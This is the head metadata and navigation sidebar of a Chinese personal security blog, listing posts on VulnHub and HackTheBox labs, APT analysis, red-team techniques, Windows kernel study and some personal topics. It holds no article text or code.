<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  <title>HackTheBox上分锦囊(一) | Hexo</title>
  <meta name="keywords" content="">
  <meta name="description" content="HackTheBox上分锦囊(一) | Hexo">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="description" content="我曾在很多地方表达过一个观点，那就是渗透不只是WEB渗透，安全技术还包含很多领域。因此本周我选择了一台高难度的靶机，具体涉及逆向、动态调试、代码审计、漏洞利用代码编写等内容。课程时长超过140分钟，请大家做好克服困难的准备！ 靶机地址: https:&#x2F;&#x2F;download.vulnhub.com&#x2F;boredhackerblog&#x2F;hard_socnet2.ova 难度等级: 高 打靶目标: 取得 ro">
<meta property="og:type" content="article">
<meta property="og:title" content="红队打靶之VulnHub_hard_socnet2">
<meta property="og:url" content="http://example.com/2024/06/20/%E7%BA%A2%E9%98%9F%E6%89%93%E9%9D%B6%E4%B9%8BVulnHub-hard-socnet2/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="我曾在很多地方表达过一个观点，那就是渗透不只是WEB渗透，安全技术还包含很多领域。因此本周我选择了一台高难度的靶机，具体涉及逆向、动态调试、代码审计、漏洞利用代码编写等内容。课程时长超过140分钟，请大家做好克服困难的准备！ 靶机地址: https:&#x2F;&#x2F;download.vulnhub.com&#x2F;boredhackerblog&#x2F;hard_socnet2.ova 难度等级: 高 打靶目标: 取得 ro">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2024-06-20T06:31:01.000Z">
<meta property="article:modified_time" content="2024-06-20T12:44:17.022Z">
<meta property="article:author" content="answer77">
<meta name="twitter:card" content="summary">


<link rel="icon" href="/img/avatar.png">

<link href="/css/style.css?v=1.1.0" rel="stylesheet">

<link href="/css/hl_theme/atom-light.css?v=1.1.0" rel="stylesheet">

<link href="//cdn.jsdelivr.net/npm/animate.css@4.1.0/animate.min.css" rel="stylesheet">

<script src="//cdn.jsdelivr.net/npm/jquery@3.5.1/dist/jquery.min.js"></script>
<script src="/js/titleTip.js?v=1.1.0" ></script>

<script src="//cdn.jsdelivr.net/npm/highlightjs@9.16.2/highlight.pack.min.js"></script>
<script>
    hljs.initHighlightingOnLoad();
</script>

<script src="//cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.js"></script>



<script src="//cdn.jsdelivr.net/npm/jquery.cookie@1.4.1/jquery.cookie.min.js" ></script>

<script src="/js/iconfont.js?v=1.1.0" ></script>

<meta name="generator" content="Hexo 7.2.0"></head>
<div style="display: none">
  <input class="theme_disqus_on" value="false">
  <input class="theme_preload_comment" value="">
  <input class="theme_blog_path" value="">
  <input id="theme_shortcut" value="true" />
  <input id="theme_highlight_on" value="true" />
  <input id="theme_code_copy" value="true" />
</div>



<body>
<aside class="nav">
    <div class="nav-left">
        <a href="/"
   class="avatar_target">
    <img class="avatar"
         src="/img/avatar.png"/>
</a>
<div class="author">
    <span>answer77</span>
</div>

<div class="icon">
    
</div>




<ul>
    <li>
        <div class="all active" data-rel="All">All
            
                <small>(89)</small>
            
        </div>
    </li>
    
        
            
                <li>
                    <div data-rel="安全开发">
                        
                        安全开发
                        <small>(2)</small>
                        
                    </div>
                    
                </li>
            
        
    
        
            
                <li>
                    <div data-rel="安卓逆向">
                        <i class="fold iconfont icon-right"></i>
                        
                        安卓逆向
                        <small>(9)</small>
                        
                    </div>
                    
                        <ul class="sub hide">
                            
                                <li>
                                    <div data-rel="安卓逆向<--->入门手册">
                                        
                                        入门手册
                                        
                                            <small>(7
                                                )</small>
                                        
                                    </div>
                                    
                                </li>
                            
                        </ul>
                    
                </li>
            
        
    
        
            
                <li>
                    <div data-rel="恶意代码分析">
                        <i class="fold iconfont icon-right"></i>
                        
                        恶意代码分析
                        <small>(6)</small>
                        
                    </div>
                    
                        <ul class="sub hide">
                            
                                <li>
                                    <div data-rel="恶意代码分析<--->勒索病毒">
                                        
                                        勒索病毒
                                        
                                            <small>(1
                                                )</small>
                                        
                                    </div>
                                    
                                </li>
                            
                                <li>
                                    <div data-rel="恶意代码分析<--->蠕虫">
                                        
                                        蠕虫
                                        
                                            <small>(2
                                                )</small>
                                        
                                    </div>
                                    
                                </li>
                            
                        </ul>
                    
                </li>
            
        
    
        
            
                <li>
                    <div data-rel="红队">
                        
                        红队
                        <small>(7)</small>
                        
                    </div>
                    
                </li>
            
        
    
        
            
                <li>
                    <div data-rel="技术研究">
                        
                        技术研究
                        <small>(7)</small>
                        
                    </div>
                    
                </li>
            
        
    
        
            
                <li>
                    <div data-rel="健身">
                        
                        健身
                        <small>(1)</small>
                        
                    </div>
                    
                </li>
            
        
    
        
            
        
    
        
            
        
    
        
            
                <li>
                    <div data-rel="漏洞研究">
                        <i class="fold iconfont icon-right"></i>
                        
                        漏洞研究
                        <small>(3)</small>
                        
                    </div>
                    
                        <ul class="sub hide">
                            
                                <li>
                                    <div data-rel="漏洞研究<--->漏洞相关知识">
                                        
                                        漏洞相关知识
                                        
                                            <small>(1
                                                )</small>
                                        
                                    </div>
                                    
                                </li>
                            
                        </ul>
                    
                </li>
            
        
    
        
            
        
    
        
            
        
    
        
            
                <li>
                    <div data-rel="软件逆向">
                        
                        软件逆向
                        <small>(1)</small>
                        
                    </div>
                    
                </li>
            
        
    
        
            
                <li>
                    <div data-rel="渗透测试">
                        <i class="fold iconfont icon-right"></i>
                        
                        渗透测试
                        <small>(2)</small>
                        
                    </div>
                    
                        <ul class="sub hide">
                            
                                <li>
                                    <div data-rel="渗透测试<--->HTB">
                                        
                                        HTB
                                        
                                            <small>(2
                                                )</small>
                                        
                                    </div>
                                    
                                </li>
                            
                        </ul>
                    
                </li>
            
        
    
        
            
                <li>
                    <div data-rel="思想">
                        
                        思想
                        <small>(2)</small>
                        
                    </div>
                    
                </li>
            
        
    
        
            
                <li>
                    <div data-rel="应急响应">
                        
                        应急响应
                        <small>(4)</small>
                        
                    </div>
                    
                </li>
            
        
    
        
            
                <li>
                    <div data-rel="游戏逆向">
                        
                        游戏逆向
                        <small>(1)</small>
                        
                    </div>
                    
                </li>
            
        
    
        
            
        
    
        
            
        
    
        
            
        
    
        
            
        
    
        
            
        
    
        
            
        
    
        
            
        
    
        
            
                <li>
                    <div data-rel="APT研究">
                        <i class="fold iconfont icon-right"></i>
                        
                        APT研究
                        <small>(7)</small>
                        
                    </div>
                    
                        <ul class="sub hide">
                            
                                <li>
                                    <div data-rel="APT研究<--->APT-C-08(蔓灵花)">
                                        
                                        APT-C-08(蔓灵花)
                                        
                                            <small>(1
                                                )</small>
                                        
                                    </div>
                                    
                                </li>
                            
                                <li>
                                    <div data-rel="APT研究<--->APT-C-23(双尾蝎)">
                                        
                                        APT-C-23(双尾蝎)
                                        
                                            <small>(1
                                                )</small>
                                        
                                    </div>
                                    
                                </li>
                            
                                <li>
                                    <div data-rel="APT研究<--->APT-C-26（Lazarus）">
                                        
                                        APT-C-26（Lazarus）
                                        
                                            <small>(1
                                                )</small>
                                        
                                    </div>
                                    
                                </li>
                            
                                <li>
                                    <div data-rel="APT研究<--->APT-C-35(肚脑虫)">
                                        
                                        APT-C-35(肚脑虫)
                                        
                                            <small>(1
                                                )</small>
                                        
                                    </div>
                                    
                                </li>
                            
                                <li>
                                    <div data-rel="APT研究<--->APT-C-48(CNC)">
                                        
                                        APT-C-48(CNC)
                                        
                                            <small>(1
                                                )</small>
                                        
                                    </div>
                                    
                                </li>
                            
                                <li>
                                    <div data-rel="APT研究<--->APT-C-56(透明部落)">
                                        
                                        APT-C-56(透明部落)
                                        
                                            <small>(1
                                                )</small>
                                        
                                    </div>
                                    
                                </li>
                            
                                <li>
                                    <div data-rel="APT研究<--->APT-Q-31(海莲花)">
                                        
                                        APT-Q-31(海莲花)
                                        
                                            <small>(1
                                                )</small>
                                        
                                    </div>
                                    
                                </li>
                            
                        </ul>
                    
                </li>
            
        
    
        
            
        
    
        
            
                <li>
                    <div data-rel="HackTheBox">
                        <i class="fold iconfont icon-right"></i>
                        
                        HackTheBox
                        <small>(7)</small>
                        
                    </div>
                    
                        <ul class="sub hide">
                            
                                <li>
                                    <div data-rel="HackTheBox<--->Challenge">
                                        
                                        Challenge
                                        
                                            <small>(1
                                                )</small>
                                        
                                    </div>
                                    
                                </li>
                            
                                <li>
                                    <div data-rel="HackTheBox<--->startpointer">
                                        
                                        startpointer
                                        
                                            <small>(1
                                                )</small>
                                        
                                    </div>
                                    
                                </li>
                            
                        </ul>
                    
                </li>
            
        
    
        
            
        
    
        
            
                <li>
                    <div data-rel="IOT">
                        
                        IOT
                        <small>(1)</small>
                        
                    </div>
                    
                </li>
            
        
    
        
            
        
    
        
            
                <li>
                    <div data-rel="win内核">
                        
                        win内核
                        <small>(6)</small>
                        
                    </div>
                    
                </li>
            
        
    
</ul>
<div class="left-bottom">
    <div class="menus">
        
            
            
            
    </div>
    <div>
        
            <a class="about  hasFriend  site_url"
               
               href="/about">About</a>
        
        <a style="width: 50%"
                
                                           class="friends">Friends</a>
        
    </div>
</div>
<input type="hidden" id="yelog_site_posts_number" value="89">

<div style="display: none">
    <span id="busuanzi_value_site_uv"></span>
    <span id="busuanzi_value_site_pv"></span>
</div>

    </div>
    <div class="nav-right">
        <div class="friends-area">
    <div class="friends-title">
        Links
        <i class="iconfont icon-left"></i>
    </div>
    <div class="friends-content">
        <ul>
            
        </ul>
    </div>
</div>
        <div class="title-list">
    <div class="right-top">
        <div id="default-panel">
            <i class="iconfont icon-search" data-title="搜索 快捷键 i"></i>
            <div class="right-title">All</div>
            <i class="iconfont icon-file-tree" data-title="切换到大纲视图 快捷键 w"></i>
        </div>
        <div id="search-panel">
            <i class="iconfont icon-left" data-title="返回"></i>
            <input id="local-search-input" autocomplete="off"/>
            <label class="border-line" for="input"></label>
            <i class="iconfont icon-case-sensitive" data-title="大小写敏感"></i>
            <i class="iconfont icon-tag" data-title="标签"></i>
        </div>
        <div id="outline-panel" style="display: none">
            <div class="right-title">大纲</div>
            <i class="iconfont icon-list" data-title="切换到文章列表"></i>
        </div>
    </div>

    <div class="tags-list">
    <input id="tag-search" />
    <div class="tag-wrapper">
        
    </div>

</div>

    
    <div id="local-search-result">

    </div>
    
    <nav id="title-list-nav">
        
        
        <a id="top" class="All 思想 "
           href="/2023/06/14/%E5%AF%B9%E4%B8%AD%E5%9B%BD%E6%95%B4%E4%B8%AA%E5%AE%89%E5%85%A8%E8%A1%8C%E4%B8%9A%E7%9A%84%E7%90%86%E8%A7%A3/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="对中国整个安全行业的理解">对中国整个安全行业的理解</span>
            <span class="post-date" title="2023-06-14 16:06:36">2023/06/14</span>
        </a>
        
        
        <a  class="All "
           href="/2024/06/20/%E7%BA%A2%E9%98%9F%E6%89%93%E9%9D%B6%E4%B9%8BVulnHub-hard-socnet2/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="红队打靶之VulnHub_hard_socnet2">红队打靶之VulnHub_hard_socnet2</span>
            <span class="post-date" title="2024-06-20 14:31:01">2024/06/20</span>
        </a>
        
        
        <a  class="All "
           href="/2024/06/20/%E7%BA%A2%E9%98%9F%E6%89%93%E9%9D%B6%E4%B9%8BVulnHub-AdmX-new/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="红队打靶之VulnHub_AdmX_new">红队打靶之VulnHub_AdmX_new</span>
            <span class="post-date" title="2024-06-20 08:40:02">2024/06/20</span>
        </a>
        
        
        <a  class="All "
           href="/2024/06/18/%E7%BA%A2%E9%98%9F%E6%89%93%E9%9D%B6%E4%B9%8BVulnHub-CHRONOS-1/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="红队打靶之VulnHub_CHRONOS_1">红队打靶之VulnHub_CHRONOS_1</span>
            <span class="post-date" title="2024-06-18 17:16:48">2024/06/18</span>
        </a>
        
        
        <a  class="All "
           href="/2024/06/18/%E7%BA%A2%E9%98%9F%E6%89%93%E9%9D%B6%E4%B9%8BVulnHub-BOREDHACKERBLOG-%E4%BA%91-AV/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="红队打靶之VulnHub_BOREDHACKERBLOG_云_AV">红队打靶之VulnHub_BOREDHACKERBLOG_云_AV</span>
            <span class="post-date" title="2024-06-18 11:18:34">2024/06/18</span>
        </a>
        
        
        <a  class="All 红队 "
           href="/2024/06/17/%E7%BA%A2%E9%98%9F%E6%89%93%E9%9D%B6%E4%B9%8BVulnHub-BOREDHACKERBLOG-SOCIAL-NETWORK/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="红队打靶之VulnHub_BOREDHACKERBLOG_SOCIAL_NETWORK">红队打靶之VulnHub_BOREDHACKERBLOG_SOCIAL_NETWORK</span>
            <span class="post-date" title="2024-06-17 21:52:00">2024/06/17</span>
        </a>
        
        
        <a  class="All "
           href="/2023/09/07/Apache%20HTTP%20Server%20%E8%AF%B7%E6%B1%82%E8%B5%B0%E7%A7%81%E6%BC%8F%E6%B4%9E%20CVE-2023-25690/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="Apache HTTP Server 请求走私漏洞 CVE-2023-25690">Apache HTTP Server 请求走私漏洞 CVE-2023-25690</span>
            <span class="post-date" title="2023-09-07 16:12:59">2023/09/07</span>
        </a>
        
        
        <a  class="All "
           href="/2023/09/06/BurpSuite%E5%AD%A6%E4%B9%A0/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="BurpSuite学习">BurpSuite学习</span>
            <span class="post-date" title="2023-09-06 15:34:11">2023/09/06</span>
        </a>
        
        
        <a  class="All "
           href="/2023/08/12/%E6%8B%8D%E7%85%A7%E6%8A%80%E5%B7%A7/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="拍照技巧">拍照技巧</span>
            <span class="post-date" title="2023-08-12 03:14:34">2023/08/12</span>
        </a>
        
        
        <a  class="All "
           href="/2023/08/11/%E7%A9%BF%E6%90%AD/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="穿搭">穿搭</span>
            <span class="post-date" title="2023-08-11 23:47:23">2023/08/11</span>
        </a>
        
        
        <a  class="All 健身 "
           href="/2023/08/10/%E8%85%B0%E9%83%A8%E7%A0%94%E7%A9%B6/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="腰部研究">腰部研究</span>
            <span class="post-date" title="2023-08-10 01:04:12">2023/08/10</span>
        </a>
        
        
        <a  class="All "
           href="/2023/08/01/DVWA%E4%B9%8BSQL%20Injection%20Snort%E8%A7%84%E5%88%99%E6%8F%90%E5%8F%96/"
           data-tag=""
           data-author="" >
            <span class="post-title" title=""></span>
            <span class="post-date" title="2023-08-01 09:43:02">2023/08/01</span>
        </a>
        
        
        <a  class="All "
           href="/2023/07/31/%E8%AF%9D%E6%9C%AF/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="话术">话术</span>
            <span class="post-date" title="2023-07-31 14:46:46">2023/07/31</span>
        </a>
        
        
        <a  class="All 安全开发 "
           href="/2023/07/24/%E6%81%B6%E6%84%8F%E6%B5%81%E9%87%8F%E7%B3%BB%E7%BB%9F%E5%BC%80%E5%8F%91/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="恶意流量系统开发">恶意流量系统开发</span>
            <span class="post-date" title="2023-07-24 16:46:05">2023/07/24</span>
        </a>
        
        
        <a  class="All "
           href="/2023/07/24/%E5%90%8E%E9%97%A8%E5%BC%80%E5%8F%91/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="后门开发">后门开发</span>
            <span class="post-date" title="2023-07-24 10:15:44">2023/07/24</span>
        </a>
        
        
        <a  class="All 安全开发 "
           href="/2023/07/21/%E6%89%AB%E6%8F%8F%E5%99%A8%E5%BC%80%E5%8F%91/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="tcp端口扫描器">tcp端口扫描器</span>
            <span class="post-date" title="2023-07-21 09:25:02">2023/07/21</span>
        </a>
        
        
        <a  class="All 红队 "
           href="/2023/07/19/%E6%8C%81%E4%B9%85%E5%8C%96/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="持久化">持久化</span>
            <span class="post-date" title="2023-07-19 16:46:54">2023/07/19</span>
        </a>
        
        
        <a  class="All "
           href="/2023/07/17/Mysql%E6%95%B0%E6%8D%AE%E5%BA%93%E5%AE%8C%E6%95%B4%E5%AD%A6%E4%B9%A0/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="Mysql数据库完整学习">Mysql数据库完整学习</span>
            <span class="post-date" title="2023-07-17 16:03:05">2023/07/17</span>
        </a>
        
        
        <a  class="All 红队 "
           href="/2023/07/17/%E9%98%B2%E5%BE%A1%E8%A7%84%E9%81%BF/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="防御规避">防御规避</span>
            <span class="post-date" title="2023-07-17 14:22:21">2023/07/17</span>
        </a>
        
        
        <a  class="All 红队 "
           href="/2023/07/17/%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="代码执行">代码执行</span>
            <span class="post-date" title="2023-07-17 10:27:01">2023/07/17</span>
        </a>
        
        
        <a  class="All 红队 "
           href="/2023/07/14/%E5%88%9D%E5%A7%8B%E8%AE%BF%E9%97%AE/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="初始访问">初始访问</span>
            <span class="post-date" title="2023-07-14 16:10:59">2023/07/14</span>
        </a>
        
        
        <a  class="All 红队 "
           href="/2023/07/14/%E4%BB%A3%E7%A0%81%E4%B8%8E%E8%BF%9B%E7%A8%8B%E6%B3%A8%E5%85%A5/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="代码与进程注入">代码与进程注入</span>
            <span class="post-date" title="2023-07-14 09:41:04">2023/07/14</span>
        </a>
        
        
        <a  class="All "
           href="/2023/07/11/python%E9%BB%91%E5%AE%A2%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E7%BC%96%E7%A8%8B%E4%B9%8B%E9%81%93/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="python黑客渗透测试编程之道">python黑客渗透测试编程之道</span>
            <span class="post-date" title="2023-07-11 10:54:54">2023/07/11</span>
        </a>
        
        
        <a  class="All 红队 "
           href="/2023/07/11/%E7%BA%A2%E9%98%9F%E6%80%9D%E8%B7%AF/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="红队思路">红队思路</span>
            <span class="post-date" title="2023-07-11 10:43:16">2023/07/11</span>
        </a>
        
        
        <a  class="All "
           href="/2023/06/30/go%E8%AF%AD%E8%A8%80%E5%85%A5%E9%97%A8/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="go语言入门">go语言入门</span>
            <span class="post-date" title="2023-06-30 16:46:48">2023/06/30</span>
        </a>
        
        
        <a  class="All HackTheBox "
           href="/2023/06/28/htb%E5%AD%A6%E9%99%A2%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="htb学院文件包含">htb学院文件包含</span>
            <span class="post-date" title="2023-06-28 16:17:24">2023/06/28</span>
        </a>
        
        
        <a  class="All HackTheBox "
           href="/2023/06/28/htb%E5%AD%A6%E9%99%A2%E4%BD%BF%E7%94%A8%20FFUF%20%E6%94%BB%E5%87%BB%20WEB%20%E5%BA%94%E7%94%A8%E7%A8%8B%E5%BA%8F/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="应用程序">应用程序</span>
            <span class="post-date" title="2023-06-28 16:14:55">2023/06/28</span>
        </a>
        
        
        <a  class="All "
           href="/2023/06/28/htb%E5%AD%A6%E9%99%A2linux%E5%9F%BA%E7%A1%80/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="htb学院 htb学院linux基础">htb学院 htb学院linux基础</span>
            <span class="post-date" title="2023-06-28 16:13:26">2023/06/28</span>
        </a>
        
        
        <a  class="All "
           href="/2023/06/28/htb%E5%AD%A6%E9%99%A2sql%E6%B3%A8%E5%85%A5%E5%9F%BA%E7%A1%80/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="htb学院htb学院sql注入基础">htb学院htb学院sql注入基础</span>
            <span class="post-date" title="2023-06-28 16:11:22">2023/06/28</span>
        </a>
        
        
        <a  class="All APT研究 APT-Q-31(海莲花) "
           href="/2023/06/14/APT-Q-31(%E6%B5%B7%E8%8E%B2%E8%8A%B1)%E6%97%B6%E9%97%B4%E7%BA%BF%E5%8F%8A%E6%94%BB%E5%87%BB%E6%89%8B%E6%B3%95%E6%80%BB%E7%BB%93/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="APT-Q-31(海莲花)时间线及攻击手法总结">APT-Q-31(海莲花)时间线及攻击手法总结</span>
            <span class="post-date" title="2023-06-14 17:00:06">2023/06/14</span>
        </a>
        
        
        <a  class="All "
           href="/2023/06/08/Gophish%E9%92%93%E9%B1%BC%E5%B9%B3%E5%8F%B0/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="Gophish钓鱼平台">Gophish钓鱼平台</span>
            <span class="post-date" title="2023-06-08 15:05:05">2023/06/08</span>
        </a>
        
        
        <a  class="All "
           href="/2023/06/08/%E5%BA%94%E6%80%A5%E5%93%8D%E5%BA%94%E5%85%A5%E9%97%A8-%E5%85%A5%E4%BE%B5%E6%8E%92%E6%9F%A5%E7%AF%87/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="应急响应入门-入侵排查篇">应急响应入门-入侵排查篇</span>
            <span class="post-date" title="2023-06-08 15:05:05">2023/06/08</span>
        </a>
        
        
        <a  class="All 思想 "
           href="/2023/06/05/%E8%AE%BA%E6%96%B0%E4%B8%AD%E5%9B%BD%E6%88%90%E7%AB%8B%E4%BB%A5%E6%9D%A5%E7%BB%8F%E6%B5%8E%E5%8D%B1%E6%9C%BA/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="论新中国成立以来经济危机">论新中国成立以来经济危机</span>
            <span class="post-date" title="2023-06-05 15:27:21">2023/06/05</span>
        </a>
        
        
        <a  class="All 渗透测试 HTB "
           href="/2023/04/25/windows%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="windows基础知识">windows基础知识</span>
            <span class="post-date" title="2023-04-25 15:08:28">2023/04/25</span>
        </a>
        
        
        <a  class="All 渗透测试 HTB "
           href="/2023/04/23/%E4%BD%BF%E7%94%A8METASPLOIT%E6%A1%86%E6%9E%B6/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="使用METASPLOIT框架">使用METASPLOIT框架</span>
            <span class="post-date" title="2023-04-23 16:53:53">2023/04/23</span>
        </a>
        
        
        <a  class="All HackTheBox "
           href="/2023/03/13/Crypto/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="Crypto">Crypto</span>
            <span class="post-date" title="2023-03-13 17:04:01">2023/03/13</span>
        </a>
        
        
        <a  class="All HackTheBox "
           href="/2023/03/11/machine/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="machine">machine</span>
            <span class="post-date" title="2023-03-11 17:47:30">2023/03/11</span>
        </a>
        
        
        <a  class="All HackTheBox Challenge "
           href="/2023/03/10/Forensics%20Collection/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="Forensics Collection">Forensics Collection</span>
            <span class="post-date" title="2023-03-10 15:15:04">2023/03/10</span>
        </a>
        
        
        <a  class="All HackTheBox "
           href="/2023/03/09/Reminiscent/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="Reminiscent">Reminiscent</span>
            <span class="post-date" title="2023-03-09 09:41:42">2023/03/09</span>
        </a>
        
        
        <a  class="All HackTheBox startpointer "
           href="/2023/03/08/HackTheBox%E4%B8%8A%E5%88%86%E9%94%A6%E5%9B%8A/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="HackTheBox上分锦囊(一)">HackTheBox上分锦囊(一)</span>
            <span class="post-date" title="2023-03-08 13:55:09">2023/03/08</span>
        </a>
        
        
        <a  class="All "
           href="/2023/02/27/%E8%AE%B0%E4%B8%80%E6%AC%A1Kaiji%E5%83%B5%E5%B0%B8%E7%BD%91%E7%BB%9C/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="记一次Kaiji僵尸网络">记一次Kaiji僵尸网络</span>
            <span class="post-date" title="2023-02-27 17:16:34">2023/02/27</span>
        </a>
        
        
        <a  class="All 漏洞研究 "
           href="/2023/02/24/cve2012-0158%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="cve2012-0158漏洞复现">cve2012-0158漏洞复现</span>
            <span class="post-date" title="2023-02-24 16:43:56">2023/02/24</span>
        </a>
        
        
        <a  class="All 技术研究 "
           href="/2023/02/22/PowerShell%E5%9F%BA%E7%A1%80/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="PowerShell基础">PowerShell基础</span>
            <span class="post-date" title="2023-02-22 11:46:25">2023/02/22</span>
        </a>
        
        
        <a  class="All APT研究 APT-C-48(CNC) "
           href="/2023/02/20/APT-C-48-CNC%E7%BB%84%E7%BB%87%E6%94%BB%E5%87%BB%E5%88%A9%E7%94%A8pub%E6%96%87%E4%BB%B6%E6%94%BB%E5%87%BB%E6%B4%BB%E5%8A%A8%E5%88%86%E6%9E%90/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="APT-C-48-CNC组织攻击利用pub文件攻击活动分析">APT-C-48-CNC组织攻击利用pub文件攻击活动分析</span>
            <span class="post-date" title="2023-02-20 14:10:47">2023/02/20</span>
        </a>
        
        
        <a  class="All "
           href="/2023/02/14/APT-C-56-%E9%80%8F%E6%98%8E%E9%83%A8%E8%90%BD%E4%BC%AA%E8%A3%85%E7%AE%80%E5%8E%86%E6%94%BB%E5%87%BB%E6%B4%BB%E5%8A%A8%E5%88%86%E6%9E%90/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="APT-C-56-透明部落伪装简历攻击活动分析">APT-C-56-透明部落伪装简历攻击活动分析</span>
            <span class="post-date" title="2023-02-14 16:08:03">2023/02/14</span>
        </a>
        
        
        <a  class="All APT研究 APT-C-35(肚脑虫) "
           href="/2023/02/11/APT-C-35%E8%82%9A%E8%84%91%E8%99%AB%E6%9F%90%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90%E4%B8%80/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="APT-C-35肚脑虫某样本分析(一)">APT-C-35肚脑虫某样本分析(一)</span>
            <span class="post-date" title="2023-02-11 18:13:48">2023/02/11</span>
        </a>
        
        
        <a  class="All 应急响应 "
           href="/2023/02/09/%E5%BA%94%E6%80%A5%E5%93%8D%E5%BA%94%E5%85%A5%E9%97%A8%E6%8C%87%E5%8D%97/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="应急响应入门指南">应急响应入门指南</span>
            <span class="post-date" title="2023-02-09 13:37:00">2023/02/09</span>
        </a>
        
        
        <a  class="All APT研究 APT-C-56(透明部落) "
           href="/2023/02/06/APT-C-56%EF%BC%88%E9%80%8F%E6%98%8E%E9%83%A8%E8%90%BD%EF%BC%89%E5%88%A9%E7%94%A8%E5%A4%96%E8%B4%B8%E9%93%BE%E6%8E%A5%E4%BC%AA%E8%A3%85%E6%96%87%E6%A1%A3%E6%94%BB%E5%87%BB%E5%88%86%E6%9E%90/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="APT-C-56（透明部落）利用外贸链接伪装文档攻击分析">APT-C-56（透明部落）利用外贸链接伪装文档攻击分析</span>
            <span class="post-date" title="2023-02-06 18:13:48">2023/02/06</span>
        </a>
        
        
        <a  class="All 恶意代码分析 "
           href="/2022/11/27/%E5%A4%A7%E7%81%B0%E7%8B%BC%E8%BF%9C%E6%8E%A7/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="大灰狼远控">大灰狼远控</span>
            <span class="post-date" title="2022-11-27 21:35:19">2022/11/27</span>
        </a>
        
        
        <a  class="All 软件逆向 "
           href="/2022/11/27/peid%E9%80%86%E5%90%91/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="peid逆向">peid逆向</span>
            <span class="post-date" title="2022-11-27 10:15:30">2022/11/27</span>
        </a>
        
        
        <a  class="All win内核 "
           href="/2022/11/19/windbg%E5%91%BD%E4%BB%A4%E5%AD%A6%E4%B9%A0/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="windbg命令学习">windbg命令学习</span>
            <span class="post-date" title="2022-11-19 22:31:27">2022/11/19</span>
        </a>
        
        
        <a  class="All win内核 "
           href="/2022/11/19/%E8%BF%9B%E7%A8%8B%E5%92%8C%E7%BA%BF%E7%A8%8B/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="进程和线程">进程和线程</span>
            <span class="post-date" title="2022-11-19 20:42:28">2022/11/19</span>
        </a>
        
        
        <a  class="All win内核 "
           href="/2022/11/15/%E4%BF%9D%E6%8A%A4%E6%A8%A1%E5%BC%8F/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="保护模式">保护模式</span>
            <span class="post-date" title="2022-11-15 15:35:26">2022/11/15</span>
        </a>
        
        
        <a  class="All win内核 "
           href="/2022/11/14/winX86%E5%86%85%E6%A0%B8%E9%A9%B1%E5%8A%A8%E5%BC%80%E5%8F%91/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="winX86内核驱动开发">winX86内核驱动开发</span>
            <span class="post-date" title="2022-11-14 16:22:58">2022/11/14</span>
        </a>
        
        
        <a  class="All win内核 "
           href="/2022/11/13/%E5%86%85%E6%A0%B8%E5%AD%A6%E4%B9%A0%E5%8F%8C%E6%9C%BA%E8%B0%83%E8%AF%95/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="内核环境搭建学习">内核环境搭建学习</span>
            <span class="post-date" title="2022-11-13 15:05:11">2022/11/13</span>
        </a>
        
        
        <a  class="All 游戏逆向 "
